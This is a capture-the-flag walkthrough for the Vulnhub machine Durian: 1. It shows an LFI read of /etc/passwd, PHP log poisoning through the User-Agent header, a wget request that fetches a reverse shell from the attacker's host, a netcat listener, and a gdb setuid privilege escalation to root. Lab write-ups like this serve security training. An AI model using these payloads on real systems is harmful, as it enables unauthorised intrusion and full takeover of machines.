Durian Vulnhub Walkthrough

Today, I am going to share a writeup for the boot2root challenge of the Vulnhub machine Durian: 1. It was actually an intermediate box based on a Linux. and our goal is for this machine is to read the /root flag file. you can download here the machine

Network Scanning

We begin by scanning our network finding our target IP address by using the Nmap tool. you can use any other tool like netdiscover.

sudo nmap -sn 192.168.43.1/24
Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

The target machine is active on 192.168.43.77, Let’s run the Nmap tool aggressive scan scanning all ports and running services.

sudo nmap -sV -p- 192.168.43.77

Our Nmap Scanning is complete and Nmap finds 4 open ports, 22/SSH, 7080/LiteSpeed, 8000/HTTP Nginx, and 8088/HTTP LiteSpeed service.

Enumeration

Let’s move on to the enumeration part and try to find hidden files and directory in the webserver. We will use the dirb tool.

dirb http://192.168.43.77:8000
Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

Our dirb scanning is complete and we found some useful directory let’s open the directory one by one, We open the /cgi-data directory and here we found a getimage.php.

After check the source code getimage.php file we confirmed this URL is vulnerable to LFI ( Local File Inclusion ) let’s read the passwd file.

view-source:http://192.168.43.77/cgi-data/getimage.php?file=/etc/passwd
Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

We open the burp suite and reload the page and capture the request and send it to the repeater request, then we try Apache log poising.

User-Agent: Mozilla/5.0 <?php system($_GET['backdoor']); ?> Gecko/20100101 Firefox/68.0
Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

and we successfully create a backdoor shell on the target server. let’s download the PHP reverse shell target machine we use the payload output /var/www/html/blog directory,

GET /cgi-data/getImage.php?file=/var/log/durain.log/access.log&backdoor=wget+192.168.43.103/shell.php+-O+../blog/shell.php HTTP/1.1
Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

Once our reverse shell is downloaded target machine. first, we start our netcat listener and then we execute our reverse shell. you can execute the shell by navigating the /blog directory.

sudo nc -lvp 4545
GET /cgi-data/getImage.php?file=/var/log/durain.log/access.log&backdoor=php+../blog/shell.php HTTP/1.1

and got a reverse connection target machine.

Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

Privilege Escalation

We check the sudo permission for our current user by executing the command sudo -l, and We see that we can execute two commands as the root user and without root password. and also we check the SUID permissions.

But we can’t found any useful binnary file we again start enumeration the machine we run the getcap -r ( displays the capabilities files ) 2>/dev/null ( standard error output )

and we get two capabilities files we interested in gdb privilege escalation let’s run the privilege escalation command and escalate the privilege root user.

sudo -l
getcap -r / 2>/dev/null
gdb -nx -ex 'python import os; os.setuid(0)' -ex '!bash' -ex quit

Finally we have root shell target machine let’s move the root directory and read the final flag.

cd /root
ls
cat proof.txt
Durian Vulnhub Walkthrough, Durian: 1 Vulnhub Walkthrough

Monitoring Vulnhub Walkthrough link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →